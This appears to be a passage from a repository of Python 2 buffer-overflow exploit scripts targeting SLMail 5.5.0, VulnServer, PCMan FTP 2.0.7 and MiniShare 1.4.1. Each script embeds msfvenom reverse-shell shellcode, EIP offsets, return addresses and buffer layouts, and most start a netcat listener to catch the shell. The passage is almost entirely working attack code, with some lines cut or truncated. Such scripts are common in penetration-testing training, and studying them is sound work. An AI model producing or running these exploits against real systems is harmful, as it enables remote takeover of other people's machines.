+= "\xff\x0f\x4c\x44\xed\x44\xfd\x07\x7b\x9a\x73\x32" 51 | payload += "\xc9\x9c\x8b\x3d\x7d\xf5\xba\xb6\x12\x82\x42\x1d" 52 | payload += "\x57\x7c\x09\x3c\xf1\x15\xd4\xd4\x40\x78\xe7\x02" 53 | payload += "\x86\x85\x64\xa7\x76\x72\x74\xc2\x73\x3e\x32\x3e" 54 | payload += "\x09\x2f\xd7\x40\xbe\x50\xf2\x22\x21\xc3\x9e\x8a" 55 | payload += "\xc4\x63\x04\xd3" 56 | 57 | #----------------------------# 58 | # Buffer Structure # 59 | #----------------------------# 60 | # buffer = SIZE # 61 | # buffer = " " # 62 | # buffer = AAA...........AAA # 63 | # buffer = EIP # 64 | # buffer = NOPSled # 65 | # buffer = payload # 66 | # buffer = BBB...........BBB # 67 | # buffer = "\r\n" # 68 | #----------------------------# 69 | 70 | buffer = "SIZE" 71 | buffer += " " 72 | buffer += "A" * 246 73 | buffer += struct.pack(' # 15 | #---------------------------------------------------------------------------------------------# 16 | 17 | import sys 18 | import socket 19 | import time 20 | import struct 21 | import subprocess 22 | 23 | 24 | if len(sys.argv) < 2: 25 | print "Usage : python exploit.py " 26 | print "Example : python exploit.py 10.11.0.100" 27 | sys.exit(0) 28 | 29 | HOST = sys.argv[1] 30 | 31 | 32 | #-------------------------------------------------------------------------------------------------------# 33 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.199 LPORT=1337 -b "\x00\x0a" -f python -v payload # 34 | #-------------------------------------------------------------------------------------------------------# 35 | 36 | payload = "" 37 | payload += "\xbd\x06\x1f\xed\xf1\xdd\xc6\xd9\x74\x24\xf4\x5a" 38 | payload += "\x2b\xc9\xb1\x52\x31\x6a\x12\x03\x6a\x12\x83\xec" 39 | payload += "\xe3\x0f\x04\x0c\xf3\x52\xe7\xec\x04\x33\x61\x09" 40 | payload += "\x35\x73\x15\x5a\x66\x43\x5d\x0e\x8b\x28\x33\xba" 41 | payload += "\x18\x5c\x9c\xcd\xa9\xeb\xfa\xe0\x2a\x47\x3e\x63" 42 | payload += "\xa9\x9a\x13\x43\x90\x54\x66\x82\xd5\x89\x8b\xd6" 43 | payload += "\x8e\xc6\x3e\xc6\xbb\x93\x82\x6d\xf7\x32\x83\x92" 44 | payload += "\x40\x34\xa2\x05\xda\x6f\x64\xa4\x0f\x04\x2d\xbe" 45 | payload += "\x4c\x21\xe7\x35\xa6\xdd\xf6\x9f\xf6\x1e\x54\xde" 46 | payload += "\x36\xed\xa4\x27\xf0\x0e\xd3\x51\x02\xb2\xe4\xa6" 47 | payload += "\x78\x68\x60\x3c\xda\xfb\xd2\x98\xda\x28\x84\x6b" 48 | payload += "\xd0\x85\xc2\x33\xf5\x18\x06\x48\x01\x90\xa9\x9e" 49 | payload += "\x83\xe2\x8d\x3a\xcf\xb1\xac\x1b\xb5\x14\xd0\x7b" 50 | payload += "\x16\xc8\x74\xf0\xbb\x1d\x05\x5b\xd4\xd2\x24\x63" 51 | payload += "\x24\x7d\x3e\x10\x16\x22\x94\xbe\x1a\xab\x32\x39" 52 | payload += "\x5c\x86\x83\xd5\xa3\x29\xf4\xfc\x67\x7d\xa4\x96" 53 | payload += "\x4e\xfe\x2f\x66\x6e\x2b\xff\x36\xc0\x84\x40\xe6" 54 | payload += "\xa0\x74\x29\xec\x2e\xaa\x49\x0f\xe5\xc3\xe0\xea" 55 | payload += "\x6e\xe6\xff\xf4\xa9\x9e\xfd\xf4\x30\x66\x8b\x12" 56 | payload += "\x50\x88\xdd\x8d\xcd\x31\x44\x45\x6f\xbd\x52\x20" 57 | payload += "\xaf\x35\x51\xd5\x7e\xbe\x1c\xc5\x17\x4e\x6b\xb7" 58 | payload += "\xbe\x51\x41\xdf\x5d\xc3\x0e\x1f\x2b\xf8\x98\x48" 59 | payload += "\x7c\xce\xd0\x1c\x90\x69\x4b\x02\x69\xef\xb4\x86" 60 | payload += "\xb6\xcc\x3b\x07\x3a\x68\x18\x17\x82\x71\x24\x43" 61 | payload += "\x5a\x24\xf2\x3d\x1c\x9e\xb4\x97\xf6\x4d\x1f\x7f" 62 | payload += "\x8e\xbd\xa0\xf9\x8f\xeb\x56\xe5\x3e\x42\x2f\x1a" 63 | payload += "\x8e\x02\xa7\x63\xf2\xb2\x48\xbe\xb6\xc3\x02\xe2" 64 | payload += "\x9f\x4b\xcb\x77\xa2\x11\xec\xa2\xe1\x2f\x6f\x46" 65 | payload += "\x9a\xcb\x6f\x23\x9f\x90\x37\xd8\xed\x89\xdd\xde" 66 | payload += "\x42\xa9\xf7" 67 | 68 | #----------------------------# 69 | # Buffer Structure # 70 | #----------------------------# 71 | # buffer = AAA...........AAA # 72 | # buffer = EIP # 73 | # buffer = NOPSled # 74 | # buffer = payload # 75 | # buffer = BBB...........BBB # 76 | #----------------------------# 77 | 78 | 79 | buffer = "A" * 2606 80 | buffer += struct.pack('" 97 | subprocess.call(['nc -lnvp 1337'], shell=True) 98 | except: 99 | print "Could not connect to SLMail 5.5.0 Server (._.)" 100 | 101 | 102 | -------------------------------------------------------------------------------- /Exploits/VulnServer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = VulnServer # 4 | # Download Link = https://github.com/stephenbradshaw/vulnserver # 5 | # Date = 9/13/2017 # 6 | # Author = @ihack4falafel # 7 | # Tested on = Windows 7 - Professional N SP1 # 8 | # EIP Offset = 1040 # 9 | # Badchars = None # 10 | # RET Address = 0x65d11d71 : "\xFF\xE4" | [VulnServer.exe] # 11 | # Usage = python exploit.py # 12 | #---------------------------------------------------------------------------------------------# 13 | 14 | import sys 15 | import socket 16 | import time 17 | import struct 18 | import subprocess 19 | 20 | #---------------#---------# 21 | W = '\033[0m' # White # 22 | R = '\033[31m' # Red # 23 | G = '\033[32m' # Green # 24 | O = '\033[33m' # Orange # 25 | B = '\033[34m' # Blue # 26 | P = '\033[35m' # Purple # 27 | C = '\033[36m' # Cyan # 28 | M = '\033[35m' # Magenta # 29 | Y = '\033[33m' # Yellow # 30 | #---------------#---------# 31 | 32 | 33 | if len(sys.argv) < 2: 34 | print Y+ "Usage :" + P+ " python exploit.py " +W 35 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 " +W 36 | sys.exit(0) 37 | 38 | HOST = sys.argv[1] 39 | 40 | #-------------------------------------------------------------------------------------------------------# 41 | # msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.199 LPORT=1337 -b "\x00\x0a" -f python -v payload # 42 | #-------------------------------------------------------------------------------------------------------# 43 | 44 | payload = "" 45 | payload += "\xdb\xca\xba\x3a\xb9\x98\x21\xd9\x74\x24\xf4\x5e" 46 | payload += "\x2b\xc9\xb1\x52\x83\xc6\x04\x31\x56\x13\x03\x6c" 47 | payload += "\xaa\x7a\xd4\x6c\x24\xf8\x17\x8c\xb5\x9d\x9e\x69" 48 | payload += "\x84\x9d\xc5\xfa\xb7\x2d\x8d\xae\x3b\xc5\xc3\x5a" 49 | payload += "\xcf\xab\xcb\x6d\x78\x01\x2a\x40\x79\x3a\x0e\xc3" 50 | payload += "\xf9\x41\x43\x23\xc3\x89\x96\x22\x04\xf7\x5b\x76" 51 | payload += "\xdd\x73\xc9\x66\x6a\xc9\xd2\x0d\x20\xdf\x52\xf2" 52 | payload += "\xf1\xde\x73\xa5\x8a\xb8\x53\x44\x5e\xb1\xdd\x5e" 53 | payload += "\x83\xfc\x94\xd5\x77\x8a\x26\x3f\x46\x73\x84\x7e" 54 | payload += "\x66\x86\xd4\x47\x41\x79\xa3\xb1\xb1\x04\xb4\x06" 55 | payload += "\xcb\xd2\x31\x9c\x6b\x90\xe2\x78\x8d\x75\x74\x0b" 56 | payload += "\x81\x32\xf2\x53\x86\xc5\xd7\xe8\xb2\x4e\xd6\x3e" 57 | payload += "\x33\x14\xfd\x9a\x1f\xce\x9c\xbb\xc5\xa1\xa1\xdb" 58 | payload += "\xa5\x1e\x04\x90\x48\x4a\x35\xfb\x04\xbf\x74\x03" 59 | payload += "\xd5\xd7\x0f\x70\xe7\x78\xa4\x1e\x4b\xf0\x62\xd9" 60 | payload += "\xac\x2b\xd2\x75\x53\xd4\x23\x5c\x90\x80\x73\xf6" 61 | payload += "\x31\xa9\x1f\x06\xbd\x7c\x8f\x56\x11\x2f\x70\x06" 62 | payload += "\xd1\x9f\x18\x4c\xde\xc0\x39\x6f\x34\x69\xd3\x8a" 63 | payload += "\xdf\x9c\x2f\x94\xd8\xc9\x2d\x94\xe3\x30\xbb\x72" 64 | payload += "\x81\x52\xed\x2d\x3e\xca\xb4\xa5\xdf\x13\x63\xc0" 65 | payload += "\xe0\x98\x80\x35\xae\x68\xec\x25\x47\x99\xbb\x17" 66 | payload += "\xce\xa6\x11\x3f\x8c\x35\xfe\xbf\xdb\x25\xa9\xe8" 67 | payload += "\x8c\x98\xa0\x7c\x21\x82\x1a\x62\xb8\x52\x64\x26" 68 | payload += "\x67\xa7\x6b\xa7\xea\x93\x4f\xb7\x32\x1b\xd4\xe3" 69 | payload += "\xea\x4a\x82\x5d\x4d\x25\x64\x37\x07\x9a\x2e\xdf" 70 | payload += "\xde\xd0\xf0\x99\xde\x3c\x87\x45\x6e\xe9\xde\x7a" 71 | payload += "\x5f\x7d\xd7\x03\xbd\x1d\x18\xde\x05\x2d\x53\x42" 72 | payload += "\x2f\xa6\x3a\x17\x6d\xab\xbc\xc2\xb2\xd2\x3e\xe6" 73 | payload += "\x4a\x21\x5e\x83\x4f\x6d\xd8\x78\x22\xfe\x8d\x7e" 74 | payload += "\x91\xff\x87" 75 | 76 | #----------------------------# 77 | # Buffer Structure # 78 | #----------------------------# 79 | # buffer = "AUTH " # 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | 88 | buffer = "AUTH " 89 | buffer += "A" * 1040 90 | buffer += struct.pack('" +W 105 | 106 | except Exception,msg: 107 | print R+ "[-]" + P+ " Could not connect to VulnServer Server" + Y+ " (._.)" +W 108 | sys.exit(0) 109 | -------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_USER.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'USER' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/12/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2000 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x7e429353 : "\xFF\xE4" | [USER32.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.127.128 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" 46 | payload += "\xbe\x2d\xf7\xaf\xc6\xdb\xc7\xd9\x74\x24\xf4\x5b" 47 | payload += "\x29\xc9\xb1\x52\x31\x73\x12\x03\x73\x12\x83\xee" 48 | payload += "\xf3\x4d\x33\x0c\x13\x13\xbc\xec\xe4\x74\x34\x09" 49 | payload += "\xd5\xb4\x22\x5a\x46\x05\x20\x0e\x6b\xee\x64\xba" 50 | payload += "\xf8\x82\xa0\xcd\x49\x28\x97\xe0\x4a\x01\xeb\x63" 51 | payload += "\xc9\x58\x38\x43\xf0\x92\x4d\x82\x35\xce\xbc\xd6" 52 | payload += "\xee\x84\x13\xc6\x9b\xd1\xaf\x6d\xd7\xf4\xb7\x92" 53 | payload += "\xa0\xf7\x96\x05\xba\xa1\x38\xa4\x6f\xda\x70\xbe" 54 | payload += "\x6c\xe7\xcb\x35\x46\x93\xcd\x9f\x96\x5c\x61\xde" 55 | payload += "\x16\xaf\x7b\x27\x90\x50\x0e\x51\xe2\xed\x09\xa6" 56 | payload += "\x98\x29\x9f\x3c\x3a\xb9\x07\x98\xba\x6e\xd1\x6b" 57 | payload += "\xb0\xdb\x95\x33\xd5\xda\x7a\x48\xe1\x57\x7d\x9e" 58 | payload += "\x63\x23\x5a\x3a\x2f\xf7\xc3\x1b\x95\x56\xfb\x7b" 59 | payload += "\x76\x06\x59\xf0\x9b\x53\xd0\x5b\xf4\x90\xd9\x63" 60 | payload += "\x04\xbf\x6a\x10\x36\x60\xc1\xbe\x7a\xe9\xcf\x39" 61 | payload += "\x7c\xc0\xa8\xd5\x83\xeb\xc8\xfc\x47\xbf\x98\x96" 62 | payload += "\x6e\xc0\x72\x66\x8e\x15\xd4\x36\x20\xc6\x95\xe6" 63 | payload += "\x80\xb6\x7d\xec\x0e\xe8\x9e\x0f\xc5\x81\x35\xea" 64 | payload += "\x8e\x6d\x61\x8b\xce\x06\x70\x73\xca\xef\xfd\x95" 65 | payload += "\xbe\x1f\xa8\x0e\x57\xb9\xf1\xc4\xc6\x46\x2c\xa1" 66 | payload += "\xc9\xcd\xc3\x56\x87\x25\xa9\x44\x70\xc6\xe4\x36" 67 | payload += "\xd7\xd9\xd2\x5e\xbb\x48\xb9\x9e\xb2\x70\x16\xc9" 68 | payload += "\x93\x47\x6f\x9f\x09\xf1\xd9\xbd\xd3\x67\x21\x05" 69 | payload += "\x08\x54\xac\x84\xdd\xe0\x8a\x96\x1b\xe8\x96\xc2" 70 | payload += "\xf3\xbf\x40\xbc\xb5\x69\x23\x16\x6c\xc5\xed\xfe" 71 | payload += "\xe9\x25\x2e\x78\xf6\x63\xd8\x64\x47\xda\x9d\x9b" 72 | payload += "\x68\x8a\x29\xe4\x94\x2a\xd5\x3f\x1d\x5a\x9c\x1d" 73 | payload += "\x34\xf3\x79\xf4\x04\x9e\x79\x23\x4a\xa7\xf9\xc1" 74 | payload += "\x33\x5c\xe1\xa0\x36\x18\xa5\x59\x4b\x31\x40\x5d" 75 | payload += "\xf8\x32\x41" 76 | 77 | 78 | #----------------------------# 79 | # Buffer Structure # 80 | #----------------------------# 81 | # buffer = AAA...........AAA # 82 | # buffer = EIP # 83 | # buffer = NOPSled # 84 | # buffer = payload # 85 | # buffer = BBB...........BBB # 86 | #----------------------------# 87 | 88 | buffer = "A" * 2000 89 | buffer += struct.pack('" +W 104 | subprocess.call(['nc -lnvp 1337'], shell=True) 105 | 106 | except Exception,msg: 107 | 108 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 109 | sys.exit(0) 110 | 111 | -------------------------------------------------------------------------------- /Exploits/MS_v1.4.1.py: -------------------------------------------------------------------------------- 1 | #!/usr/share/python 2 | #-----------------------------------------------------------------------------------------------------------# 3 | # Software = MiniShare Version 1.4.1 # 4 | # Download Link = https://www.exploit-db.com/apps/0ffe5385147edd1f9e7b460c6d7cb0a6-minishare-1.4.1.zip # 5 | # Date = 12/18/2017 # 6 | # Reference = http://www.securityfocus.com/bid/11620/discuss # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 1787 # 10 | # Badchars = "\x00\x0d\" # 11 | # RET Address = 0x7e429353 : "\xFF\xE4" | [USER32.dll] # 12 | # Usage = python exploit.py # 13 | #-----------------------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import time 18 | import struct 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | if len(sys.argv) < 2: 34 | print Y+ "Usage :" + P+ " python exploit.py " +W 35 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 " +W 36 | sys.exit(0) 37 | 38 | HOST = sys.argv[1] 39 | 40 | #-----------------------------------------------------------------------------------------------------------# 41 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.151 LPORT=1337 -b "\x00\x0d" -f python -v payload # 42 | #-----------------------------------------------------------------------------------------------------------# 43 | 44 | payload = "" 45 | payload += "\xda\xd2\xd9\x74\x24\xf4\x58\x2b\xc9\xbb\x06\x2b" 46 | payload += "\x6e\x10\xb1\x52\x31\x58\x17\x03\x58\x17\x83\xee" 47 | payload += "\xd7\x8c\xe5\x12\xcf\xd3\x06\xea\x10\xb4\x8f\x0f" 48 | payload += "\x21\xf4\xf4\x44\x12\xc4\x7f\x08\x9f\xaf\xd2\xb8" 49 | payload += "\x14\xdd\xfa\xcf\x9d\x68\xdd\xfe\x1e\xc0\x1d\x61" 50 | payload += "\x9d\x1b\x72\x41\x9c\xd3\x87\x80\xd9\x0e\x65\xd0" 51 | payload += "\xb2\x45\xd8\xc4\xb7\x10\xe1\x6f\x8b\xb5\x61\x8c" 52 | payload += "\x5c\xb7\x40\x03\xd6\xee\x42\xa2\x3b\x9b\xca\xbc" 53 | payload += "\x58\xa6\x85\x37\xaa\x5c\x14\x91\xe2\x9d\xbb\xdc" 54 | payload += "\xca\x6f\xc5\x19\xec\x8f\xb0\x53\x0e\x2d\xc3\xa0" 55 | payload += "\x6c\xe9\x46\x32\xd6\x7a\xf0\x9e\xe6\xaf\x67\x55" 56 | payload += "\xe4\x04\xe3\x31\xe9\x9b\x20\x4a\x15\x17\xc7\x9c" 57 | payload += "\x9f\x63\xec\x38\xfb\x30\x8d\x19\xa1\x97\xb2\x79" 58 | payload += "\x0a\x47\x17\xf2\xa7\x9c\x2a\x59\xa0\x51\x07\x61" 59 | payload += "\x30\xfe\x10\x12\x02\xa1\x8a\xbc\x2e\x2a\x15\x3b" 60 | payload += "\x50\x01\xe1\xd3\xaf\xaa\x12\xfa\x6b\xfe\x42\x94" 61 | payload += "\x5a\x7f\x09\x64\x62\xaa\x9e\x34\xcc\x05\x5f\xe4" 62 | payload += "\xac\xf5\x37\xee\x22\x29\x27\x11\xe9\x42\xc2\xe8" 63 | payload += "\x7a\xad\xbb\x35\xed\x45\xbe\xb9\x17\xaf\x37\x5f" 64 | payload += "\x7d\xdf\x11\xc8\xea\x46\x38\x82\x8b\x87\x96\xef" 65 | payload += "\x8c\x0c\x15\x10\x42\xe5\x50\x02\x33\x05\x2f\x78" 66 | payload += "\x92\x1a\x85\x14\x78\x88\x42\xe4\xf7\xb1\xdc\xb3" 67 | payload += "\x50\x07\x15\x51\x4d\x3e\x8f\x47\x8c\xa6\xe8\xc3" 68 | payload += "\x4b\x1b\xf6\xca\x1e\x27\xdc\xdc\xe6\xa8\x58\x88" 69 | payload += "\xb6\xfe\x36\x66\x71\xa9\xf8\xd0\x2b\x06\x53\xb4" 70 | payload += "\xaa\x64\x64\xc2\xb2\xa0\x12\x2a\x02\x1d\x63\x55" 71 | payload += "\xab\xc9\x63\x2e\xd1\x69\x8b\xe5\x51\x99\xc6\xa7" 72 | payload += "\xf0\x32\x8f\x32\x41\x5f\x30\xe9\x86\x66\xb3\x1b" 73 | payload += "\x77\x9d\xab\x6e\x72\xd9\x6b\x83\x0e\x72\x1e\xa3" 74 | payload += "\xbd\x73\x0b" 75 | 76 | #----------------------------# 77 | # Buffer Structure # 78 | #----------------------------# 79 | # buffer = AAA...........AAA # 80 | # buffer = EIP - RET Address # 81 | # buffer = NOPSled # 82 | # buffer = payload # 83 | # buffer = BBB...........BBB # 84 | #----------------------------# 85 | 86 | buffer = "GET " 87 | buffer += "A" * 1787 88 | buffer += struct.pack('" +W 102 | subprocess.call(['nc -lnvp 1337'], shell=True) 103 | except Exception,msg: 104 | print R+ "[-]" + P+ " Could not connect to MiniShare Server" + Y+ " (._.)" +W 105 | sys.exit(0) 106 | 107 | -------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_GET.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'GET' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/19/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2007 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x77fab277 : "\xFF\xE4" | [SHLWAPI.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.129 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" 46 | payload += "\xdb\xc4\xd9\x74\x24\xf4\x5d\xb8\x20\xf9\xbe\xa0" 47 | payload += "\x29\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\xcd" 48 | payload += "\x05\x5c\x55\xf1\x1e\x23\x96\x09\xdf\x44\x1e\xec" 49 | payload += "\xee\x44\x44\x65\x40\x75\x0e\x2b\x6d\xfe\x42\xdf" 50 | payload += "\xe6\x72\x4b\xd0\x4f\x38\xad\xdf\x50\x11\x8d\x7e" 51 | payload += "\xd3\x68\xc2\xa0\xea\xa2\x17\xa1\x2b\xde\xda\xf3" 52 | payload += "\xe4\x94\x49\xe3\x81\xe1\x51\x88\xda\xe4\xd1\x6d" 53 | payload += "\xaa\x07\xf3\x20\xa0\x51\xd3\xc3\x65\xea\x5a\xdb" 54 | payload += "\x6a\xd7\x15\x50\x58\xa3\xa7\xb0\x90\x4c\x0b\xfd" 55 | payload += "\x1c\xbf\x55\x3a\x9a\x20\x20\x32\xd8\xdd\x33\x81" 56 | payload += "\xa2\x39\xb1\x11\x04\xc9\x61\xfd\xb4\x1e\xf7\x76" 57 | payload += "\xba\xeb\x73\xd0\xdf\xea\x50\x6b\xdb\x67\x57\xbb" 58 | payload += "\x6d\x33\x7c\x1f\x35\xe7\x1d\x06\x93\x46\x21\x58" 59 | payload += "\x7c\x36\x87\x13\x91\x23\xba\x7e\xfe\x80\xf7\x80" 60 | payload += "\xfe\x8e\x80\xf3\xcc\x11\x3b\x9b\x7c\xd9\xe5\x5c" 61 | payload += "\x82\xf0\x52\xf2\x7d\xfb\xa2\xdb\xb9\xaf\xf2\x73" 62 | payload += "\x6b\xd0\x98\x83\x94\x05\x0e\xd3\x3a\xf6\xef\x83" 63 | payload += "\xfa\xa6\x87\xc9\xf4\x99\xb8\xf2\xde\xb1\x53\x09" 64 | payload += "\x89\x7d\x0b\xd6\xc8\x16\x4e\xd8\xcf\xdf\xc7\x3e" 65 | payload += "\xa5\x0f\x8e\xe9\x52\xa9\x8b\x61\xc2\x36\x06\x0c" 66 | payload += "\xc4\xbd\xa5\xf1\x8b\x35\xc3\xe1\x7c\xb6\x9e\x5b" 67 | payload += "\x2a\xc9\x34\xf3\xb0\x58\xd3\x03\xbe\x40\x4c\x54" 68 | payload += "\x97\xb7\x85\x30\x05\xe1\x3f\x26\xd4\x77\x07\xe2" 69 | payload += "\x03\x44\x86\xeb\xc6\xf0\xac\xfb\x1e\xf8\xe8\xaf" 70 | payload += "\xce\xaf\xa6\x19\xa9\x19\x09\xf3\x63\xf5\xc3\x93" 71 | payload += "\xf2\x35\xd4\xe5\xfa\x13\xa2\x09\x4a\xca\xf3\x36" 72 | payload += "\x63\x9a\xf3\x4f\x99\x3a\xfb\x9a\x19\x4a\xb6\x86" 73 | payload += "\x08\xc3\x1f\x53\x09\x8e\x9f\x8e\x4e\xb7\x23\x3a" 74 | payload += "\x2f\x4c\x3b\x4f\x2a\x08\xfb\xbc\x46\x01\x6e\xc2" 75 | payload += "\xf5\x22\xbb" 76 | 77 | #----------------------------# 78 | # Buffer Structure # 79 | #----------------------------# 80 | # buffer = AAA...........AAA # 81 | # buffer = EIP # 82 | # buffer = NOPSled # 83 | # buffer = payload # 84 | # buffer = BBB...........BBB # 85 | #----------------------------# 86 | 87 | buffer = "A" * 2007 88 | buffer += struct.pack('" +W 107 | subprocess.call(['nc -lnvp 1337'], shell=True) 108 | 109 | except Exception,msg: 110 | 111 | print R+ "[-]" + P+ " Could not connect to PCMan FTP Server" + Y+ " (._.)" +W 112 | sys.exit(0) 113 | 114 | -------------------------------------------------------------------------------- /Exploits/PCManFTP_2.0.7_PORT.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | #---------------------------------------------------------------------------------------------# 3 | # Software = PCMan FTP Server 2.0.7 - 'PORT' # 4 | # Download Link = https://www.exploit-db.com/apps/9fceb6fefd0f3ca1a8c36e97b6cc925d-PCMan.7z # 5 | # Date = 9/19/2017 # 6 | # Reference = https://www.exploit-db.com/exploits/26471/ # 7 | # Author = @ihack4falafel # 8 | # Tested on = Windows XP SP3 - Professional # 9 | # EIP Offset = 2007 # 10 | # Badchars = "\x00\x0A\x0D" # 11 | # RET Address = 0x7cbd51fb : "\xFF\xE4" | [SHELL32.dll] # 12 | # Usage = python exploit.py # 13 | #---------------------------------------------------------------------------------------------# 14 | 15 | import sys 16 | import socket 17 | import struct 18 | import time 19 | import subprocess 20 | 21 | #---------------#---------# 22 | W = '\033[0m' # White # 23 | R = '\033[31m' # Red # 24 | G = '\033[32m' # Green # 25 | O = '\033[33m' # Orange # 26 | B = '\033[34m' # Blue # 27 | P = '\033[35m' # Purple # 28 | C = '\033[36m' # Cyan # 29 | M = '\033[35m' # Magenta # 30 | Y = '\033[33m' # Yellow # 31 | #---------------#---------# 32 | 33 | 34 | if len(sys.argv) < 2: 35 | print Y+ "Usage :" + P+ " python exploit.py " +W 36 | print Y+ "Example :" + P+ " python exploit.py 127.0.0.1 0" +W 37 | sys.exit(0) 38 | 39 | HOST = sys.argv[1] 40 | 41 | #---------------------------------------------------------------------------------------------------------------# 42 | # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.199.129 LPORT=1337 -b "\x00\x0A\x0D" -f python -v payload # 43 | #---------------------------------------------------------------------------------------------------------------# 44 | 45 | payload = "" 46 | payload += "\xdb\xc4\xd9\x74\x24\xf4\x5d\xb8\x20\xf9\xbe\xa0" 47 | payload += "\x29\xc9\xb1\x52\x31\x45\x17\x03\x45\x17\x83\xcd" 48 | payload += "\x05\x5c\x55\xf1\x1e\x23\x96\x09\xdf\x44\x1e\xec" 49 | payload += "\xee\x44\x44\x65\x40\x75\x0e\x2b\x6d\xfe\x42\xdf" 50 | payload += "\xe6\x72\x4b\xd0\x4f\x38\xad\xdf\x50\x11\x8d\x7e" 51 | payload += "\xd3\x68\xc2\xa0\xea\xa2\x17\xa1\x2b\xde\xda\xf3" 52 | payload += "\xe4\x94\x49\xe3\x81\xe1\x51\x88\xda\xe4\xd1\x6d" 53 | payload += "\xaa\x07\xf3\x20\xa0\x51\xd3\xc3\x65\xea\x5a\xdb" 54 | payload += "\x6a\xd7\x15\x50\x58\xa3\xa7\xb0\x90\x4c\x0b\xfd" 55 | payload += "\x1c\xbf\x55\x3a\x9a\x20\x20\x32\xd8\xdd\x33\x81" 56 | payload += "\xa2\x39\xb1\x11\x04\xc9\x61\xfd\xb4\x1e\xf7\x76" 57 | payload += "\xba\xeb\x73\xd0\xdf\xea\x50\x6b\xdb\x67\x57\xbb" 58 | payload += "\x6d\x33\x7c\x1f\x35\xe7\x1d\x06\x93\x46\x21\x58" 59 | payload += "\x7c\x36\x87\x13\x91\x23\xba\x7e\xfe\x80\xf7\x80" 60 | payload += "\xfe\x8e\x80\xf3\xcc\x11\x3b\x9b\x7c\xd9\xe5\x5c" 61 | payload += "\x82\xf0\x52\xf2\x7d\xfb\xa2\xdb\xb9\xaf\xf2\x73" 62 | payload += "\x6b\xd0\x98\x83\x94\x05\x0e\xd3\x3a\xf6\xef\x83" 63 | payload += "\xfa\xa6\x87\xc9\xf4\x99\xb8\xf2\xde\xb1\x53\x09" 64 | payload += 